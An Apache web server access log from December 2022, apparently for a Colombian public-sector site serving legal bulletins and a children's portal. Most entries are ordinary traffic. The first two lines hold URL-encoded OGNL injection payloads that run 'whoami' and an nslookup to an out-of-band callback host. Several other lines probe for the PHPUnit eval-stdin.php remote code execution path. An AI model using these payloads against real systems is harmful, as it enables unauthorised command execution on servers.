45.79.136.154 - - [21/Dec/2022:05:43:17 -0500] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 403 1024
45.79.136.154 - - [21/Dec/2022:05:43:21 -0500] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cehd0m4l986cc0o0001079zssre5747b6.oast.fun%22%29%7D/ HTTP/1.1" 403 1024
216.245.221.92 - - [21/Dec/2022:05:43:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:42:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:43:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
66.249.64.13 - - [21/Dec/2022:05:45:19 -0500] "-" 408 -
114.119.165.136 - - [21/Dec/2022:05:47:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4831.pdf HTTP/1.1" 200 748885
23.92.21.31 - - [21/Dec/2022:05:47:59 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1049
172.22.2.4 - - [21/Dec/2022:05:48:00 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2006%20del%2016%20de%20Agosto%20de%202017.pdf HTTP/1.1" 304 -
201.245.192.253 - - [21/Dec/2022:05:48:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
23.92.21.31 - - [21/Dec/2022:05:48:03 -0500] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:05:48:07 -0500] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:05:48:11 -0500] "GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:05:48:15 -0500] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:05:48:19 -0500] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1049
216.245.221.92 - - [21/Dec/2022:05:48:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:48:44 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:48:48 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
172.22.2.4 - - [21/Dec/2022:05:49:02 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [21/Dec/2022:05:49:03 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [21/Dec/2022:05:49:13 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=perra HTTP/1.1" 200 626
172.22.2.4 - - [21/Dec/2022:05:49:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=PMRRA HTTP/1.1" 200 626
114.119.135.224 - - [21/Dec/2022:05:49:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4029.pdf HTTP/1.1" 200 751271
172.22.2.4 - - [21/Dec/2022:05:49:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve=PMRRA HTTP/1.1" 200 626
172.22.2.4 - - [21/Dec/2022:05:48:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.96 - - [21/Dec/2022:05:50:20 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 109802
114.119.136.143 - - [21/Dec/2022:05:50:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1143.pdf HTTP/1.1" 200 114754
157.55.39.96 - - [21/Dec/2022:05:50:40 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/n2.min.js?1528383544 HTTP/1.1" 200 3495
157.55.39.96 - - [21/Dec/2022:05:50:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
157.55.39.96 - - [21/Dec/2022:05:50:41 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
157.55.39.96 - - [21/Dec/2022:05:50:41 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
207.46.13.122 - - [21/Dec/2022:05:50:43 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/plugins/type/simple/simple/dist/smartslider-simple-type-frontend.min.js?1563274780 HTTP/1.1" 200 18726
157.55.39.212 - - [21/Dec/2022:05:50:44 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
157.55.39.165 - - [21/Dec/2022:05:50:45 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/nextend-frontend.min.js?1563274780 HTTP/1.1" 200 76980
157.55.39.165 - - [21/Dec/2022:05:50:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
157.55.39.165 - - [21/Dec/2022:05:50:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
157.55.39.165 - - [21/Dec/2022:05:50:47 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
157.55.39.46 - - [21/Dec/2022:05:50:47 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/dist/smartslider-frontend.min.js?1563274780 HTTP/1.1" 200 128256
